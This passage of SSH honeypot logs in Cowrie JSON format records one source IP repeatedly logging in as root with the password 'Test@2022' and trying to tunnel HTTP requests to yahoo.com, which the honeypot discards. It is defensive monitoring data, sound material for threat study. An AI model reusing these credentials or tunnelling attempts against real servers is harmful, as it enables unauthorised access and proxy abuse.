sa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:01:54.026350Z","src_ip":"213.209.150.239","session":"720a6d701012"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:01:54.308950Z","src_ip":"213.209.150.239","session":"720a6d701012"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":13884,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:13884","sensor":"my-vps","timestamp":"2025-08-26T01:01:54.366575Z","session":"720a6d701012"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:01:54.423240Z","src_ip":"213.209.150.239","session":"720a6d701012"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"213.209.150.239","src_port":14628,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:14628","sensor":"my-vps","timestamp":"2025-08-26T01:01:54.579007Z","session":"720a6d701012"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:01:54.635602Z","src_ip":"213.209.150.239","session":"720a6d701012"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:01:54.693082Z","src_ip":"213.209.150.239","session":"720a6d701012"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":20555,"dst_ip":"1.2.3.4","dst_port":22,"session":"cca7a6d0c5f1","protocol":"ssh","message":"New connection: 213.209.150.239:20555 (1.2.3.4:22) [session: cca7a6d0c5f1]","sensor":"my-vps","timestamp":"2025-08-26T01:01:54.748656Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:01:54.749682Z","src_ip":"213.209.150.239","session":"cca7a6d0c5f1"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:01:54.806802Z","src_ip":"213.209.150.239","session":"cca7a6d0c5f1"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:01:55.088394Z","src_ip":"213.209.150.239","session":"cca7a6d0c5f1"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"213.209.150.239","src_port":9587,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:9587","sensor":"my-vps","timestamp":"2025-08-26T01:01:55.146618Z","session":"cca7a6d0c5f1"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:01:55.203260Z","src_ip":"213.209.150.239","session":"cca7a6d0c5f1"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"213.209.150.239","src_port":29711,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:29711","sensor":"my-vps","timestamp":"2025-08-26T01:01:55.359020Z","session":"cca7a6d0c5f1"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:01:55.415676Z","src_ip":"213.209.150.239","session":"cca7a6d0c5f1"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:01:55.473062Z","src_ip":"213.209.150.239","session":"cca7a6d0c5f1"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":20603,"dst_ip":"1.2.3.4","dst_port":22,"session":"82575b1af299","protocol":"ssh","message":"New connection: 213.209.150.239:20603 (1.2.3.4:22) [session: 82575b1af299]","sensor":"my-vps","timestamp":"2025-08-26T01:01:55.528553Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:01:55.529268Z","src_ip":"213.209.150.239","session":"82575b1af299"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:01:55.585841Z","src_ip":"213.209.150.239","session":"82575b1af299"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:01:55.867679Z","src_ip":"213.209.150.239","session":"82575b1af299"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":13954,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:13954","sensor":"my-vps","timestamp":"2025-08-26T01:01:55.926487Z","session":"82575b1af299"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:01:55.983210Z","src_ip":"213.209.150.239","session":"82575b1af299"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":1982,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:1982","sensor":"my-vps","timestamp":"2025-08-26T01:01:56.139244Z","session":"82575b1af299"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:01:56.196059Z","src_ip":"213.209.150.239","session":"82575b1af299"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:01:56.253747Z","src_ip":"213.209.150.239","session":"82575b1af299"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":20670,"dst_ip":"1.2.3.4","dst_port":22,"session":"cf38f21963ca","protocol":"ssh","message":"New connection: 213.209.150.239:20670 (1.2.3.4:22) [session: cf38f21963ca]","sensor":"my-vps","timestamp":"2025-08-26T01:01:56.309145Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:01:56.310443Z","src_ip":"213.209.150.239","session":"cf38f21963ca"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:01:56.366931Z","src_ip":"213.209.150.239","session":"cf38f21963ca"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:01:56.648157Z","src_ip":"213.209.150.239","session":"cf38f21963ca"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"213.209.150.239","src_port":24555,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:24555","sensor":"my-vps","timestamp":"2025-08-26T01:01:56.705695Z","session":"cf38f21963ca"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:01:56.762375Z","src_ip":"213.209.150.239","session":"cf38f21963ca"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"213.209.150.239","src_port":19419,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:19419","sensor":"my-vps","timestamp":"2025-08-26T01:01:56.918957Z","session":"cf38f21963ca"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:01:56.975631Z","src_ip":"213.209.150.239","session":"cf38f21963ca"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:01:57.034320Z","src_ip":"213.209.150.239","session":"cf38f21963ca"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":20717,"dst_ip":"1.2.3.4","dst_port":22,"session":"b766bcfba3bd","protocol":"ssh","message":"New connection: 213.209.150.239:20717 (1.2.3.4:22) [session: b766bcfba3bd]","sensor":"my-vps","timestamp":"2025-08-26T01:01:57.080674Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:01:57.081796Z","src_ip":"213.209.150.239","session":"b766bcfba3bd"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:01:57.129037Z","src_ip":"213.209.150.239","session":"b766bcfba3bd"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:01:57.363880Z","src_ip":"213.209.150.239","session":"b766bcfba3bd"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"213.209.150.239","src_port":19663,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:19663","sensor":"my-vps","timestamp":"2025-08-26T01:01:57.412092Z","session":"b766bcfba3bd"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:01:57.459241Z","src_ip":"213.209.150.239","session":"b766bcfba3bd"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"213.209.150.239","src_port":2995,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:2995","sensor":"my-vps","timestamp":"2025-08-26T01:01:57.597500Z","session":"b766bcfba3bd"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:01:57.644782Z","src_ip":"213.209.150.239","session":"b766bcfba3bd"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:01:57.692697Z","src_ip":"213.209.150.239","session":"b766bcfba3bd"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":20768,"dst_ip":"1.2.3.4","dst_port":22,"session":"a0e7893750cb","protocol":"ssh","message":"New connection: 213.209.150.239:20768 (1.2.3.4:22) [session: a0e7893750cb]","sensor":"my-vps","timestamp":"2025-08-26T01:01:57.739035Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:01:57.739841Z","src_ip":"213.209.150.239","session":"a0e7893750cb"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:01:57.787201Z","src_ip":"213.209.150.239","session":"a0e7893750cb"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:01:58.022871Z","src_ip":"213.209.150.239","session":"a0e7893750cb"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"213.209.150.239","src_port":8963,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:8963","sensor":"my-vps","timestamp":"2025-08-26T01:01:58.072136Z","session":"a0e7893750cb"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:01:58.119756Z","src_ip":"213.209.150.239","session":"a0e7893750cb"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"213.209.150.239","src_port":7402,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:7402","sensor":"my-vps","timestamp":"2025-08-26T01:01:58.257573Z","session":"a0e7893750cb"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:01:58.304922Z","src_ip":"213.209.150.239","session":"a0e7893750cb"}
